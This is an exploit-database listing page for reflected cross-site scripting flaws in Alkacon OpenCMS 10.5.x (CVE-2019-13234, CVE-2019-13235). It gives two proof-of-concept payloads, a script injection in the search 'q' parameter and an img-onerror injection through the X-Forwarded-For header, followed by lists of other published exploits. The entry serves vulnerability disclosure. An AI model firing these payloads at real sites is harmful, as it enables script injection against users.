Menu

Search for hundreds of thousands of exploits

"Alkacon OpenCMS 10.5.x - Cross-Site Scripting"

Author

Aetsu

Platform

multiple

Release date

2019-09-02

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
# Exploit Title: Alkacon OpenCMS 10.5.x - Multiple XSS in Apollo Template
# Google Dork: N/A
# Date: 18/07/2019
# Exploit Author: Aetsu
# Vendor Homepage: http://www.opencms.org
# Software Link: https://github.com/alkacon/apollo-template
# Version: 10.5.x
# Tested on: 10.5.5 / 10.5.4
# CVE : CVE-2019-13234, CVE-2019-13235

1. Reflected XSS in the search engine:
- Affected resource -> "q"
POC:
```
https://example.com/apollo-demo/search/index.html?facet_category_exact_ignoremax&q=demo%20examplez4e62%22%3e%3cscript%3ealert(1)%3c%2fscript%3ewhhpg&facet_type_ignoremax&facet_search.subsite_exact_ignoremax&reloaded&facet_query_query_ignoremax&
```
2. Reflected XSS in login form:
POC:
The vulnerability appears when the header X-Forwarded-For is used as shown
in the next request:
```
GET
/login/index.html?requestedResource=&name=Editor&password=editor&action=login
HTTP/1.1
Host: example.com
X-Forwarded-For: .<img src=. onerror=alert('XSS')>.test.ninja
```


Extended POCs: https://aetsu.github.io/OpenCms
Release Date Title Type Platform Author
2019-09-09 "Enigma NMS 65.0.0 - SQL Injection" webapps multiple mark
2019-09-09 "Enigma NMS 65.0.0 - OS Command Injection" webapps multiple mark
2019-09-09 "Enigma NMS 65.0.0 - Cross-Site Request Forgery" webapps multiple mark
2019-09-06 "Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Remote Code Execution" remote multiple "Justin Wagner"
2019-09-02 "Alkacon OpenCMS 10.5.x - Local File inclusion" webapps multiple Aetsu
2019-09-02 "Alkacon OpenCMS 10.5.x - Cross-Site Scripting (2)" webapps multiple Aetsu
2019-09-02 "Alkacon OpenCMS 10.5.x - Cross-Site Scripting" webapps multiple Aetsu
2019-08-29 "Webkit JSC: JIT - Uninitialized Variable Access in ArgumentsEliminationPhase::transform" dos multiple "Google Security Research"
2019-08-21 "Cisco UCS Director_ Cisco Integrated Management Controller Supervisor and Cisco UCS Director Express for Big Data - Multiple Vulnerabilities" remote multiple "Pedro Ribeiro"
2019-08-27 "Tableau - XML External Entity" webapps multiple "Jarad Kopf"
2019-08-23 "Nimble Streamer 3.0.2-2 < 3.5.4-9 - Directory Traversal" webapps multiple MaYaSeVeN
2019-08-21 "Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure (Metasploit)" webapps multiple "Alyssa Herrera"
2019-08-21 "LibreOffice < 6.2.6 Macro - Python Code Execution (Metasploit)" remote multiple LoadLow
2019-08-01 "SilverSHielD 6.x - Local Privilege Escalation" local multiple "Ian Bredemeyer"
2019-08-15 "NSKeyedUnarchiver - Info Leak in Decoding SGBigUTF8String" dos multiple "Google Security Research"
2019-08-12 "ManageEngine OpManager 12.4x - Unauthenticated Remote Command Execution (Metasploit)" remote multiple AkkuS
2019-08-12 "ManageEngine Application Manager 14.2 - Privilege Escalation / Remote Command Execution (Metasploit)" remote multiple AkkuS
2019-08-12 "ManageEngine OpManager 12.4x - Privilege Escalation / Remote Command Execution (Metasploit)" remote multiple AkkuS
2019-08-12 "WebKit - UXSS via XSLT and Nested Document Replacements" dos multiple "Google Security Research"
2019-08-08 "Aptana Jaxer 1.0.3.4547 - Local File inclusion" webapps multiple "Steph Jensen"
2019-08-07 "Google Chrome 74.0.3729.0 / 76.0.3789.0 - Heap Use-After-Free in blink::PresentationAvailabilityState::UpdateAvailability" dos multiple "Google Security Research"
2019-08-05 "ARMBot Botnet - Arbitrary Code Execution" remote multiple prsecurity
2019-08-01 "Ultimate Loan Manager 2.0 - Cross-Site Scripting" webapps multiple "Metin Yunus Kandemir"
2019-07-31 "Oracle Hyperion Planning 11.1.2.3 - XML External Entity" webapps multiple "Lucas Dinucci"
2019-07-30 "iMessage - NSKeyedUnarchiver Deserialization Allows file Backed NSData Objects" dos multiple "Google Security Research"
2019-07-30 "iMessage - Memory Corruption when Decoding NSKnownKeysDictionary1" dos multiple "Google Security Research"
2019-07-30 "iMessage - NSArray Deserialization can Invoke Subclass that does not Retain References" dos multiple "Google Security Research"
2019-07-30 "macOS / iOS JavaScriptCore - JSValue Use-After-Free in ValueProfiles" dos multiple "Google Security Research"
2019-07-30 "macOS / iOS JavaScriptCore - Loop-Invariant Code Motion (LICM) Leaves Object Property Access Unguarded" dos multiple "Google Security Research"
2019-07-30 "macOS / iOS NSKeyedUnarchiver - Use-After-Free of ObjC Objects when Unarchiving OITSUIntDictionary Instances" dos multiple "Google Security Research"
Release Date Title Type Platform Author
2019-09-02 "Alkacon OpenCMS 10.5.x - Local File inclusion" webapps multiple Aetsu
2019-09-02 "Alkacon OpenCMS 10.5.x - Cross-Site Scripting (2)" webapps multiple Aetsu
2019-09-02 "Alkacon OpenCMS 10.5.x - Cross-Site Scripting" webapps multiple Aetsu
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47338/?format=json')
                        {"url": "https://www.nmmapper.com/api/exploitdetails/47338/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/47338/41700/alkacon-opencms-105x-cross-site-scripting/download/", "exploit_id": "47338", "exploit_description": "\"Alkacon OpenCMS 10.5.x - Cross-Site Scripting\"", "exploit_date": "2019-09-02", "exploit_author": "Aetsu", "exploit_type": "webapps", "exploit_platform": "multiple", "exploit_port": null}
                    

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Wig is a web application information gathering tool, which can identify numerous Content Management Systems and other administrative applications including basic vulnerability identification.

Browse exploit APIBrowse